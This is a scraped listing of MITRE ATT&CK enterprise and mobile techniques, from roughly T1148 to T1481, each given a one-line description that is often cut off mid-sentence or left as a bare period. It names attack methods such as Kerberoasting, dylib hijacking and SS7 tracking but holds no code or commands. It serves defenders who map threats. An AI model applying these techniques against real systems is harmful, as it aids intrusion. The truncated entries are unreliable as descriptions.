View on ATT&CK

The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.

More Info

In Playbook

LC_MAIN Hijacking (T1149)

View on ATT&CK

**This technique has been deprecated and should no longer be used.

More Info

In Playbook

Plist Modification (T1150)

View on ATT&CK

Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services.

More Info

In Playbook

Space after Filename (T1151)

View on ATT&CK

Adversaries can hide a program's true filetype by changing the extension of a file.

More Info

In Playbook

Launchctl (T1152)

View on ATT&CK

Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself.

More Info

In Playbook

Source (T1153)

View on ATT&CK

**This technique has been deprecated and should no longer be used.

More Info

In Playbook

Trap (T1154)

View on ATT&CK

The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals.

More Info

In Playbook

AppleScript (T1155)

View on ATT&CK

macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC).

More Info

In Playbook

Malicious Shell Modification (T1156)

View on ATT&CK

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell.

More Info

In Playbook

Dylib Hijacking (T1157)

View on ATT&CK

macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths.

More Info

In Playbook

Hidden Files and Directories (T1158)

View on ATT&CK

To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file.

More Info

In Playbook

Launch Agent (T1159)

View on ATT&CK

Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware).

More Info

In Playbook

Launch Daemon (T1160)

View on ATT&CK

Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization.

More Info

In Playbook

LC_LOAD_DYLIB Addition (T1161)

View on ATT&CK

Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded.

More Info

In Playbook

Login Item (T1162)

View on ATT&CK

MacOS provides the option to list specific applications to run when a user logs in.

More Info

In Playbook

Rc.common (T1163)

View on ATT&CK

During the boot process, macOS executes <code>source /etc/rc.

More Info

In Playbook

Re-opened Applications (T1164)

View on ATT&CK

Starting in Mac OS X 10.

More Info

In Playbook

Startup Items (T1165)

View on ATT&CK

Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items).

More Info

In Playbook

Setuid and Setgid (T1166)

View on ATT&CK

When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page).

More Info

In Playbook

Securityd Memory (T1167)

View on ATT&CK

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.

More Info

In Playbook

Local Job Scheduling (T1168)

View on ATT&CK

On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.

More Info

In Playbook

Sudo (T1169)

View on ATT&CK

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals.

More Info

In Playbook

Mshta (T1170)

View on ATT&CK

Mshta.

More Info

In Playbook

LLMNR/NBT-NS Poisoning and Relay (T1171)

View on ATT&CK

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification.

More Info

In Playbook

Domain Fronting (T1172)

View on ATT&CK

Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.

More Info

In Playbook

Dynamic Data Exchange (T1173)

View on ATT&CK

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications.

More Info

In Playbook

Password Filter DLL (T1174)

View on ATT&CK

Windows password filters are password policy enforcement mechanisms for both domain and local accounts.

More Info

In Playbook

Component Object Model and Distributed COM (T1175)

View on ATT&CK

**This technique has been deprecated.

More Info

In Playbook

Browser Extensions (T1176)

View on ATT&CK

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems.

More Info

In Playbook

LSASS Driver (T1177)

View on ATT&CK

The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain.

More Info

In Playbook

SID-History Injection (T1178)

View on ATT&CK

The Windows security identifier (SID) is a unique value that identifies a user or group account.

More Info

In Playbook

Hooking (T1179)

View on ATT&CK

Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources.

More Info

In Playbook

Screensaver (T1180)

View on ATT&CK

Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .

More Info

In Playbook

Extra Window Memory Injection (T1181)

View on ATT&CK

Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).

More Info

In Playbook

AppCert DLLs (T1182)

View on ATT&CK

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec.

More Info

In Playbook

Image File Execution Options Injection (T1183)

View on ATT&CK

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application.

More Info

In Playbook

SSH Hijacking (T1184)

View on ATT&CK

Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems.

More Info

In Playbook

Browser Session Hijacking (T1185)

View on ATT&CK

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.

More Info

In Playbook

Process Doppelgänging (T1186)

View on ATT&CK

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations.

More Info

In Playbook

Forced Authentication (T1187)

View on ATT&CK

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

More Info

In Playbook

Multi-hop Proxy (T1188)

View on ATT&CK

To disguise the source of malicious traffic, adversaries may chain together multiple proxies.

More Info

In Playbook

Drive-by Compromise (T1189)

View on ATT&CK

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing.

More Info

In Playbook

Exploit Public-Facing Application (T1190)

View on ATT&CK

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

More Info

In Playbook

CMSTP (T1191)

View on ATT&CK

The Microsoft Connection Manager Profile Installer (CMSTP.

More Info

In Playbook

Spearphishing Link (T1192)

View on ATT&CK

Spearphishing with a link is a specific variant of spearphishing.

More Info

In Playbook

Spearphishing Attachment (T1193)

View on ATT&CK

Spearphishing attachment is a specific variant of spearphishing.

More Info

In Playbook

Spearphishing via Service (T1194)

View on ATT&CK

Spearphishing via service is a specific variant of spearphishing.

More Info

In Playbook

Supply Chain Compromise (T1195)

View on ATT&CK

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook
Supply Chain Compromise

Compromise Software Dependencies and Development Tools (T1195.001)

View on ATT&CK

Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook
Supply Chain Compromise

Compromise Software Supply Chain (T1195.002)

View on ATT&CK

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook
Supply Chain Compromise

Compromise Hardware Supply Chain (T1195.003)

View on ATT&CK

Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook

Control Panel Items (T1196)

View on ATT&CK

Windows Control Panel items are utilities that allow users to view and adjust computer settings.

More Info

In Playbook

BITS Jobs (T1197)

View on ATT&CK

Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks.

More Info

In Playbook

SIP and Trust Provider Hijacking (T1198)

View on ATT&CK

In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe).

More Info

In Playbook

Trusted Relationship (T1199)

View on ATT&CK

Adversaries may breach or otherwise leverage organizations who have access to intended victims.

More Info

In Playbook

Hardware Additions (T1200)

View on ATT&CK

Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access.

More Info

In Playbook

Password Policy Discovery (T1201)

View on ATT&CK

Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.

More Info

In Playbook

Indirect Command Execution (T1202)

View on ATT&CK

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

More Info

In Playbook

Exploitation for Client Execution (T1203)

View on ATT&CK

Adversaries may exploit software vulnerabilities in client applications to execute code.

More Info

In Playbook

User Execution (T1204)

View on ATT&CK

An adversary may rely upon specific actions by a user in order to gain execution.

More Info

In Playbook
User Execution

Malicious Link (T1204.001)

View on ATT&CK

An adversary may rely upon a user clicking a malicious link in order to gain execution.

More Info

In Playbook
User Execution

Malicious File (T1204.002)

View on ATT&CK

An adversary may rely upon a user opening a malicious file in order to gain execution.

More Info

In Playbook
User Execution

Malicious Image (T1204.003)

View on ATT&CK

Adversaries may rely on a user running a malicious image to facilitate execution.

More Info

In Playbook

Traffic Signaling (T1205)

View on ATT&CK

Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control.

More Info

In Playbook
Traffic Signaling

Port Knocking (T1205.001)

View on ATT&CK

Adversaries may use port knocking to hide open ports used for persistence or command and control.

More Info

In Playbook
Traffic Signaling

Socket Filters (T1205.002)

View on ATT&CK

Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control.

More Info

In Playbook

Sudo Caching (T1206)

View on ATT&CK

The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.

More Info

In Playbook

Rogue Domain Controller (T1207)

View on ATT&CK

Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data.

More Info

In Playbook

Kerberoasting (T1208)

View on ATT&CK

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service.

More Info

In Playbook

Time Providers (T1209)

View on ATT&CK

The Windows Time service (W32Time) enables time synchronization across and within domains.

More Info

In Playbook

Exploitation of Remote Services (T1210)

View on ATT&CK

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network.

More Info

In Playbook

Exploitation for Defense Evasion (T1211)

View on ATT&CK

Adversaries may exploit a system or application vulnerability to bypass security features.

More Info

In Playbook

Exploitation for Credential Access (T1212)

View on ATT&CK

Adversaries may exploit software vulnerabilities in an attempt to collect credentials.

More Info

In Playbook

Data from Information Repositories (T1213)

View on ATT&CK

Adversaries may leverage information repositories to mine valuable information.

More Info

In Playbook
Data from Information Repositories

Confluence (T1213.001)

View on ATT&CK

Adversaries may leverage Confluence repositories to mine valuable information.

More Info

In Playbook
Data from Information Repositories

Sharepoint (T1213.002)

View on ATT&CK

Adversaries may leverage the SharePoint repository as a source to mine valuable information.

More Info

In Playbook
Data from Information Repositories

Code Repositories (T1213.003)

View on ATT&CK

Adversaries may leverage code repositories to collect valuable information.

More Info

In Playbook
Data from Information Repositories

Customer Relationship Management Software (T1213.004)

View on ATT&CK

Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information.

More Info

In Playbook
Data from Information Repositories

Messaging Applications (T1213.005)

View on ATT&CK

Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.

More Info

In Playbook

Credentials in Registry (T1214)

View on ATT&CK

The Windows Registry stores configuration information that can be used by the system or other programs.

More Info

In Playbook

Kernel Modules and Extensions (T1215)

View on ATT&CK

Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.

More Info

In Playbook

System Script Proxy Execution (T1216)

View on ATT&CK

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files.

More Info

In Playbook
System Script Proxy Execution

PubPrn (T1216.001)

View on ATT&CK

Adversaries may use PubPrn to proxy execution of malicious remote files.

More Info

In Playbook
System Script Proxy Execution

SyncAppvPublishingServer (T1216.002)

View on ATT&CK

Adversaries may abuse SyncAppvPublishingServer.

More Info

In Playbook

Browser Information Discovery (T1217)

View on ATT&CK

Adversaries may enumerate information about browsers to learn more about compromised environments.

More Info

In Playbook

System Binary Proxy Execution (T1218)

View on ATT&CK

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.

More Info

In Playbook
System Binary Proxy Execution

Compiled HTML File (T1218.001)

View on ATT&CK

Adversaries may abuse Compiled HTML files (.

More Info

In Playbook
System Binary Proxy Execution

Control Panel (T1218.002)

View on ATT&CK

Adversaries may abuse control.

More Info

In Playbook
System Binary Proxy Execution

CMSTP (T1218.003)

View on ATT&CK

Adversaries may abuse CMSTP to proxy execution of malicious code.

More Info

In Playbook
System Binary Proxy Execution

InstallUtil (T1218.004)

View on ATT&CK

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility.

More Info

In Playbook
System Binary Proxy Execution

Mshta (T1218.005)

View on ATT&CK

Adversaries may abuse mshta.

More Info

In Playbook
System Binary Proxy Execution

Msiexec (T1218.007)

View on ATT&CK

Adversaries may abuse msiexec.

More Info

In Playbook
System Binary Proxy Execution

Odbcconf (T1218.008)

View on ATT&CK

Adversaries may abuse odbcconf.

More Info

In Playbook
System Binary Proxy Execution

Regsvcs/Regasm (T1218.009)

View on ATT&CK

Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility.

More Info

In Playbook
System Binary Proxy Execution

Regsvr32 (T1218.010)

View on ATT&CK

Adversaries may abuse Regsvr32.

More Info

In Playbook
System Binary Proxy Execution

Rundll32 (T1218.011)

View on ATT&CK

Adversaries may abuse rundll32.

More Info

In Playbook
System Binary Proxy Execution

Verclsid (T1218.012)

View on ATT&CK

Adversaries may abuse verclsid.

More Info

In Playbook
System Binary Proxy Execution

Mavinject (T1218.013)

View on ATT&CK

Adversaries may abuse mavinject.

More Info

In Playbook
System Binary Proxy Execution

MMC (T1218.014)

View on ATT&CK

Adversaries may abuse mmc.

More Info

In Playbook
System Binary Proxy Execution

Electron Applications (T1218.015)

View on ATT&CK

Adversaries may abuse components of the Electron framework to execute malicious code.

More Info

In Playbook

Remote Access Software (T1219)

View on ATT&CK

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks.

More Info

In Playbook

XSL Script Processing (T1220)

View on ATT&CK

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files.

More Info

In Playbook

Template Injection (T1221)

View on ATT&CK

Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts.

More Info

In Playbook

File and Directory Permissions Modification (T1222)

View on ATT&CK

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.

More Info

In Playbook
File and Directory Permissions Modification

Windows File and Directory Permissions Modification (T1222.001)

View on ATT&CK

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.

More Info

In Playbook
File and Directory Permissions Modification

Linux and Mac File and Directory Permissions Modification (T1222.002)

View on ATT&CK

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.

More Info

In Playbook

Compiled HTML File (T1223)

View on ATT&CK

Compiled HTML files (.

More Info

In Playbook

Boot or Logon Initialization Scripts (T1398)

View on ATT&CK

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.

More Info

In Playbook

Modify Trusted Execution Environment (T1399)

View on ATT&CK

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user.

More Info

In Playbook

Modify System Partition (T1400)

View on ATT&CK

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.

More Info

In Playbook

Device Administrator Permissions (T1401)

View on ATT&CK

Adversaries may request device administrator permissions to perform malicious actions.

More Info

In Playbook

Broadcast Receivers (T1402)

View on ATT&CK

An intent is a message passed between Android application or system components.

More Info

In Playbook

Modify Cached Executable Code (T1403)

View on ATT&CK

ART (the Android Runtime) compiles optimized code on the device itself to improve performance.

More Info

In Playbook

Exploitation for Privilege Escalation (T1404)

View on ATT&CK

Adversaries may exploit software vulnerabilities in order to elevate privileges.

More Info

In Playbook

Exploit TEE Vulnerability (T1405)

View on ATT&CK

A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone).

More Info

In Playbook

Obfuscated Files or Information (T1406)

View on ATT&CK

Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit.

More Info

In Playbook
Obfuscated Files or Information

Steganography (T1406.001)

View on ATT&CK

Adversaries may use steganography techniques in order to prevent the detection of hidden information.

More Info

In Playbook
Obfuscated Files or Information

Software Packing (T1406.002)

View on ATT&CK

Adversaries may perform software packing to conceal their code.

More Info

In Playbook

Download New Code at Runtime (T1407)

View on ATT&CK

Adversaries may download and execute dynamic code not included in the original application package after installation.

More Info

In Playbook

Disguise Root/Jailbreak Indicators (T1408)

View on ATT&CK

An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan).

More Info

In Playbook

Stored Application Data (T1409)

View on ATT&CK

Adversaries may try to access and collect application data resident on the device.

More Info

In Playbook

Network Traffic Capture or Redirection (T1410)

View on ATT&CK

An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.

More Info

In Playbook

Input Prompt (T1411)

View on ATT&CK

The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII).

More Info

In Playbook

Capture SMS Messages (T1412)

View on ATT&CK

A malicious application could capture sensitive data sent via SMS, including authentication credentials.

More Info

In Playbook

Access Sensitive Data in Device Logs (T1413)

View on ATT&CK

On versions of Android prior to 4.

More Info

In Playbook

Clipboard Data (T1414)

View on ATT&CK

Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the device clipboard.

More Info

In Playbook

URL Scheme Hijacking (T1415)

View on ATT&CK

An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme).

More Info

In Playbook

URI Hijacking (T1416)

View on ATT&CK

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

More Info

In Playbook

Input Capture (T1417)

View on ATT&CK

Adversaries may use methods of capturing user input to obtain credentials or collect information.

More Info

In Playbook
Input Capture

Keylogging (T1417.001)

View on ATT&CK

Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them.

More Info

In Playbook
Input Capture

GUI Input Capture (T1417.002)

View on ATT&CK

Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt.

More Info

In Playbook

Software Discovery (T1418)

View on ATT&CK

Adversaries may attempt to get a listing of applications that are installed on a device.

More Info

In Playbook
Software Discovery

Security Software Discovery (T1418.001)

View on ATT&CK

Adversaries may attempt to get a listing of security applications and configurations that are installed on a device.

More Info

In Playbook

Device Type Discovery (T1419)

View on ATT&CK

On Android, device type information is accessible to apps through the android.

More Info

In Playbook

File and Directory Discovery (T1420)

View on ATT&CK

Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem.

More Info

In Playbook

System Network Connections Discovery (T1421)

View on ATT&CK

Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network.

More Info

In Playbook

System Network Configuration Discovery (T1422)

View on ATT&CK

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of devices they access or through information discovery of remote systems.

More Info

In Playbook
System Network Configuration Discovery

Internet Connection Discovery (T1422.001)

View on ATT&CK

Adversaries may check for Internet connectivity on compromised systems.

More Info

In Playbook
System Network Configuration Discovery

Wi-Fi Discovery (T1422.002)

View on ATT&CK

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

More Info

In Playbook

Network Service Scanning (T1423)

View on ATT&CK

Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation.

More Info

In Playbook

Process Discovery (T1424)

View on ATT&CK

Adversaries may attempt to get information about running processes on a device.

More Info

In Playbook

Insecure Third-Party Libraries (T1425)

View on ATT&CK

.

More Info

In Playbook

System Information Discovery (T1426)

View on ATT&CK

Adversaries may attempt to get detailed information about a device’s operating system and hardware, including versions, patches, and architecture.

More Info

In Playbook

Attack PC via USB Connection (T1427)

View on ATT&CK

With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android.

More Info

In Playbook

Exploitation of Remote Services (T1428)

View on ATT&CK

Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network.

More Info

In Playbook

Audio Capture (T1429)

View on ATT&CK

Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device.

More Info

In Playbook

Location Tracking (T1430)

View on ATT&CK

Adversaries may track a device’s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device.

More Info

In Playbook
Location Tracking

Remote Device Management Services (T1430.001)

View on ATT&CK

An adversary may use access to cloud services (e.

More Info

In Playbook
Location Tracking

Impersonate SS7 Nodes (T1430.002)

View on ATT&CK

Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.

More Info

In Playbook

App Delivered via Web Download (T1431)

View on ATT&CK

.

More Info

In Playbook

Access Contact List (T1432)

View on ATT&CK

An adversary could call standard operating system APIs from a malicious application to gather contact list (i.

More Info

In Playbook

Access Call Log (T1433)

View on ATT&CK

On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.

More Info

In Playbook

App Delivered via Email Attachment (T1434)

View on ATT&CK

.

More Info

In Playbook

Access Calendar Entries (T1435)

View on ATT&CK

An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.

More Info

In Playbook

Commonly Used Port (T1436)

View on ATT&CK

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.

More Info

In Playbook

Application Layer Protocol (T1437)

View on ATT&CK

Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook
Application Layer Protocol

Web Protocols (T1437.001)

View on ATT&CK

Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook

Exfiltration Over Other Network Medium (T1438)

View on ATT&CK

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel.

More Info

In Playbook

Eavesdrop on Insecure Network Communication (T1439)

View on ATT&CK

If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.

More Info

In Playbook

Detect App Analysis Environment (T1440)

View on ATT&CK

.

More Info

In Playbook

Stolen Developer Credentials or Signing Keys (T1441)

View on ATT&CK

.

More Info

In Playbook

Fake Developer Accounts (T1442)

View on ATT&CK

.

More Info

In Playbook

Remotely Install Application (T1443)

View on ATT&CK

.

More Info

In Playbook

Masquerade as Legitimate Application (T1444)

View on ATT&CK

An adversary could distribute developed malware by masquerading the malware as a legitimate application.

More Info

In Playbook

Abuse of iOS Enterprise App Signing Key (T1445)

View on ATT&CK

.

More Info

In Playbook

Device Lockout (T1446)

View on ATT&CK

An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.

More Info

In Playbook

Delete Device Data (T1447)

View on ATT&CK

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity.

More Info

In Playbook

Carrier Billing Fraud (T1448)

View on ATT&CK

A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.

More Info

In Playbook

Exploit SS7 to Redirect Phone Calls/SMS (T1449)

View on ATT&CK

An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control.

More Info

In Playbook

Exploit SS7 to Track Device Location (T1450)

View on ATT&CK

An adversary could exploit signaling system vulnerabilities to track the location of mobile devices.

More Info

In Playbook

SIM Card Swap (T1451)

View on ATT&CK

An adversary could convince the mobile network operator (e.

More Info

In Playbook

Manipulate App Store Rankings or Ratings (T1452)

View on ATT&CK

An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications.

More Info

In Playbook

Abuse Accessibility Features (T1453)

View on ATT&CK

**This technique has been deprecated.

More Info

In Playbook

Malicious SMS Message (T1454)

View on ATT&CK

Test.

More Info

In Playbook

Exploit Baseband Vulnerability (T1455)

View on ATT&CK

.

More Info

In Playbook

Drive-By Compromise (T1456)

View on ATT&CK

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing.

More Info

In Playbook

Malicious Media Content (T1457)

View on ATT&CK

.

More Info

In Playbook

Replication Through Removable Media (T1458)

View on ATT&CK

Adversaries may move onto devices by exploiting or copying malware to devices connected via USB.

More Info

In Playbook

Device Unlock Code Guessing or Brute Force (T1459)

View on ATT&CK

.

More Info

In Playbook

Biometric Spoofing (T1460)

View on ATT&CK

.

More Info

In Playbook

Lockscreen Bypass (T1461)

View on ATT&CK

An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen.

More Info

In Playbook

Malicious Software Development Tools (T1462)

View on ATT&CK

.

More Info

In Playbook

Manipulate Device Communication (T1463)

View on ATT&CK

If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected.

More Info

In Playbook

Network Denial of Service (T1464)

View on ATT&CK

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users.

More Info

In Playbook

Rogue Wi-Fi Access Points (T1465)

View on ATT&CK

An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).

More Info

In Playbook

Downgrade to Insecure Protocols (T1466)

View on ATT&CK

An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187).

More Info

In Playbook

Rogue Cellular Base Station (T1467)

View on ATT&CK

An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication.

More Info

In Playbook

Remotely Track Device Without Authorization (T1468)

View on ATT&CK

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.

More Info

In Playbook

Remotely Wipe Data Without Authorization (T1469)

View on ATT&CK

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.

More Info

In Playbook

Obtain Device Cloud Backups (T1470)

View on ATT&CK

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.

More Info

In Playbook

Data Encrypted for Impact (T1471)

View on ATT&CK

An adversary may encrypt files stored on a mobile device to prevent the user from accessing them.

More Info

In Playbook

Generate Fraudulent Advertising Revenue (T1472)

View on ATT&CK

An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.

More Info

In Playbook

Malicious or Vulnerable Built-in Device Functionality (T1473)

View on ATT&CK

.

More Info

In Playbook

Supply Chain Compromise (T1474)

View on ATT&CK

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook
Supply Chain Compromise

Compromise Software Dependencies and Development Tools (T1474.001)

View on ATT&CK

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook
Supply Chain Compromise

Compromise Hardware Supply Chain (T1474.002)

View on ATT&CK

Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook
Supply Chain Compromise

Compromise Software Supply Chain (T1474.003)

View on ATT&CK

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook

Deliver Malicious App via Authorized App Store (T1475)

View on ATT&CK

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices.

More Info

In Playbook

Deliver Malicious App via Other Means (T1476)

View on ATT&CK

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices.

More Info

In Playbook

Exploit via Radio Interfaces (T1477)

View on ATT&CK

The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.

More Info

In Playbook

Install Insecure or Malicious Configuration (T1478)

View on ATT&CK

An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings.

More Info

In Playbook

Execution Guardrails (T1480)

View on ATT&CK

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target.

More Info

In Playbook
Execution Guardrails

Environmental Keying (T1480.001)

View on ATT&CK

Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment.

More Info

In Playbook
Execution Guardrails

Mutual Exclusion (T1480.002)

View on ATT&CK

Adversaries may constrain execution or actions based on the presence of a mutex associated with malware.

More Info

In Playbook

Web Service (T1481)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.

More Info

